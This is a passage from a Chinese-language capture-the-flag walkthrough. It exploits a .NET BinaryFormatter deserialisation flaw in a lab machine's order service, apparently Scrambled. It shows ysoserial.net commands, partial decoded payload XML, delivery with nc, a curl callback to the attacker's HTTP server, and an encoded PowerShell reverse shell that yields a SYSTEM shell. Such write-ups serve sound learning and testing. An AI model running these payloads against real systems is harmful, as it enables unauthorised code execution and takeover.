那继续点击尝试他的功能，之后再刷新查看日志

当我于这里更新order时，观测到它由客户端向服务器发送了序列化的请求

根据他开头的UPLOAD_ORDER关键字尝试寻找，于ScrambleNetRequest中发现了这部分。

接下来找后面的序列化是在哪部分拼接到UPLOAD_ORDER后方，这里可以通过findusage找到SendRequestAndGetResponse之中进行的调用

后面这里就是

UPLOAD_ORDER +";" +Request.Parmeter+"\n"

关注一下Request.Parmeter怎么来的，其实是上面的UploadOrder方法调用的。

这里又是salseorder，它定义了一个SerializeToBase64方法。

#salseorder
...
    public string SerializeToBase64()
    {
      BinaryFormatter binaryFormatter = new BinaryFormatter();
      Log.Write("Binary formatter init successful");
      using (MemoryStream serializationStream = new MemoryStream())
      {
        binaryFormatter.Serialize((Stream) serializationStream, (object) this);
        return Convert.ToBase64String(serializationStream.ToArray());
      }
    }
...

这里说白了他的流程就是把upload_order的信息序列化后，拼接成UPLOAD_ORDER;序列化内容，而后发送到服务端。

也就是scrm.local:4411，那对server侧肯定也就会Deserialize也就是反序列化。

这里需要用到ysoserial.net

因为我也不知道对面都有哪些链子能用，所以从看着顺眼的挨个打。

这里我选的DataSet，因为他看起来名字短。

.\ysoserial.exe -g DataSet -c "cmd /c curl 10.10.16.10" -f BinaryFormatter -o base64
AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAu....

这里的话有个坑，生成时候不要用'统一用"，比如下面这个我用的'来圈住命令部分

.\ysoserial.exe  -g DataSet -c 'cmd /c curl 10.10.16.10' -f BinaryFormatter -o base64
AAEAAAD...

生成的payload解码之后是这样的

...
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c curl" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

再来比对一下"圈住的解码后，很显然命令没了半截，所以一定要谨记。

...
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c cmd /c curl 10.10.16.10" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

把生成的base64后的载荷发送过去

└─$ cat yso           
AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0...

不管是debug日志中文件中还是反编译得到的结论，都得知了，前面加UPLOAD_ORDER发送给服务端，对侧就会接收。

所以我们也这么发送payload。

└─$ echo "UPLOAD_ORDER;`cat yso`" |nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.

同时也收到对方反序列化执行了curl

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [04/Jan/2025 08:25:17] "GET / HTTP/1.1" 200 -

接下来就替换载荷为revshell

.\ysoserial.exe DataSet -g DataSet -c "powershell -e JABj....." -f BinaryFormatter -o base64
AAEAAAD/...

再一次发送，得到system用户shell

getRoot

---

收获良多，很好的机器